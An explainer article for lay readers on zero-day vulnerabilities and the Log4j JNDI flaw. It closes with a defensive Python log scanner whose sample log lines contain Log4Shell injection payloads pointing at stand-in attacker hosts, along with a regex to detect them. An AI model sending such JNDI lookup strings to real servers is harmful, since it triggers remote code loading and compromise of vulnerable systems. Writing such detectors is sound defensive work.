Everything you need to know about Log4j vulnerability
Doomsday prophecies, the 2012 phenomenon, and Don’t Look Up: if there is one thing humanity loves, it’s stories about the end of the world.
But if the apocalypse was once an asteroid the size of Paris heading toward Earth, since the Y2K bug the end of the world has seemed less physical and more virtual.
The vulnerability in the Log4j library (explained later) burst into our lives like Britney Spears after a decade away. Categorized as a zero-day vulnerability, which is code red, this event has been another reminder that, however much we would like to avoid the subject, cyberspace is an integral part of our lives.
However, some of us, a.k.a. the majority of the population, get a headache every time something technical surfaces. Dozens of LinkedIn posts have tried, with little success, to explain to the “users” among us how the ground shifted.
And while the various parables might make Shakespeare proud, they do little to keep non-programmers from getting confused. So if you don’t want to get lost in the hallway conversations, stay tuned.
What is a Zero-day vulnerability?
It’s important to distinguish between three concepts when it comes to zero-day vulnerabilities:
Zero-day vulnerability – a vulnerability in a system or device that hackers have discovered while the vendor is still unaware of it. This increases the chances of the vulnerability being exploited by malicious actors. Sometimes these vulnerabilities are offered to the highest bidder on the dark web; other times they are published in hacker communities for everyone’s free use. Who said there’s no honor among thieves?
Once the vendor discovers the vulnerability, it has zero days to fix it, or as the pros call it, release a patch. The patch is sent to all users and is designed to prevent exploitation of the vulnerability; it’s what we users know as an update.
Zero-day exploitation – detecting the weakness is not enough; to achieve the effect they want, hackers need a way to exploit it. As long as the vendor has not yet discovered the vulnerability, hackers can write exploit code that lets them use the vulnerability to infiltrate the system.
Zero-day attack – the use of that specially written exploit code to steal information from the system or cause damage.
Why is this a critical issue?
Developers are constantly searching for bugs in their software, but when hackers discover these vulnerabilities first, there is a rush to exploit them. The hackers aim to inject exploit code, code written specifically for the vulnerability found, and use it for malicious purposes. This can harm the software’s users, often in the form of identity theft. When the developers discover the vulnerability, they rush to release an update that blocks the exploit.
So what’s the real issue here?
Well, finding these weaknesses is not that simple; sometimes months go by between the moment hackers discover one and the moment the vendor notices it. Anti-virus systems commonly scan for known viruses using a database. Zero-day attacks, however, are by definition new attacks, so there is no reference to them in that database.
After the update is developed and released, many end users are in no hurry to install it, often because they do not understand the severity of the situation. This is common in organizations that have not filled key cybersecurity positions, such as the CISO (chief information security officer).
The diversity of the targeted components is another obstacle for developers. These vulnerabilities can be detected in many system components including:
- Operating Systems
- Open-source components (open source refers to a model for mass software development in which the code is accessible and open to everyone)
- Internet-connected components, or IoT (all physical devices capable of connecting to the Internet, such as smart TVs, smart home gadgets, etc.)
Everyone is a potential target, from individuals who use vulnerable systems and have access to sensitive information to global organizations.
Detecting zero-day attacks
Some signs can help vendors discover these vulnerabilities, such as a massive amount of traffic or abnormal scans being performed.
In addition, some systems scan user activity and requests and try to determine whether they originate from malicious actors.
An evolving method uses AI (artificial intelligence) to build a database like those used in anti-virus software, only instead of searching for code sequences known to be malicious, the system learns to detect suspicious interactions.
Log4j – we deserve to understand
Log4j is a library that collects logs: data on every movement and request made in the system on which it is installed. Similar to a blog, it allows software developers to keep track of this data. With the help of the data collected, developers can analyze user movements and look for bugs.
Log4j is developed by Apache, an open-source organization that is also responsible for serving requests from Internet users (in professional terms, HTTP requests). The library is written in Java, a programming language that became very popular in the nineties and is the base for many systems. It was designed to run on platforms such as macOS, Windows, and Linux (an operating system like Windows, only defined as open source).
The fact that Log4j is open source has made it especially popular, and it is embedded in almost every corner of the global network: from computer games to large shopping sites and vital systems such as water supply, energy, electricity, and more. In other words, everyone is in trouble.
The first alert about a potential vulnerability reached Apache’s development team on November 24 from the information security team of Alibaba, the well-known shopping site.
But the general public became aware of this significant problem on December 9, after the information security team of the sandbox computer game Minecraft (yes, the creator of the infamous dance) posted a warning about the vulnerability to all gamers on their blog. The team also released a patch (update), but it was quickly discovered that the problem was not confined to the sandbox game.
The vulnerability has been named CVE-2021-44228 (because it always has a longer name), or more conveniently Log4j, and it abuses a protocol called JNDI.
Java’s JNDI protocol enables retrieving information from another server, which helps in collecting logs and associating them with their source. This is not necessarily dangerous, because normally the vendor decides which server the information is retrieved from. However, it was discovered that a request could be sent to JNDI that directs the protocol to any server in the world and retrieves an item of the sender’s choosing.
For example, hackers could send an HTTP request that redirects the protocol to a website they control and downloads malware from it. In this case, the JNDI protocol was exploited through another sub-protocol called LDAP. However, the great problem with this vulnerability is the wide variety of ways in which JNDI can be exploited, including through additional protocols called DNS and RMI.
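As an added example (not part of the original article), here is a small Python scanner a defender could run over web-server access logs to spot the kind of JNDI lookup string described above and report which outside server it points to. The log lines, IP addresses and host names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (not real traffic). Lines 3 and 4
# carry a JNDI lookup string, once in the User-Agent header and once as a
# percent-encoded query parameter: exactly the kind of untrusted input that
# a vulnerable Log4j version would write to its log and then resolve.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=%24%7Bjndi%3Armi%3A%2F%2Fevil.example%3A1099%2Fx%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# A JNDI lookup that uses one of the protocols the article names
# (LDAP, RMI, DNS); group 2 captures the server the lookup points at.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://([^/}\s:]+)", re.IGNORECASE)


def find_jndi_lookups(line):
    """Return (protocol, host) pairs for every JNDI lookup found in one log line."""
    decoded = line
    # Query parameters reach the log percent-encoded, sometimes more than once,
    # so decode until the text stops changing (bounded to two rounds).
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_LOOKUP.finditer(decoded)]


def scan_logs(lines):
    """Return alerts as (line number, source IP, protocol, host) tuples."""
    alerts = []
    for lineno, line in enumerate(lines, start=1):
        hits = find_jndi_lookups(line)
        if not hits:
            continue
        src_ip = line.split(" ", 1)[0]  # first field of the common log format
        for protocol, host in hits:
            alerts.append((lineno, src_ip, protocol, host))
    return alerts


if __name__ == "__main__":
    for lineno, ip, protocol, host in scan_logs(SAMPLE_LOGS):
        print(f"line {lineno}: {ip} sent a JNDI lookup via {protocol} pointing at {host}")
```

Any hit means the request should be investigated and the host it points at is a candidate for blocking at the egress firewall; the real fix remains updating Log4j.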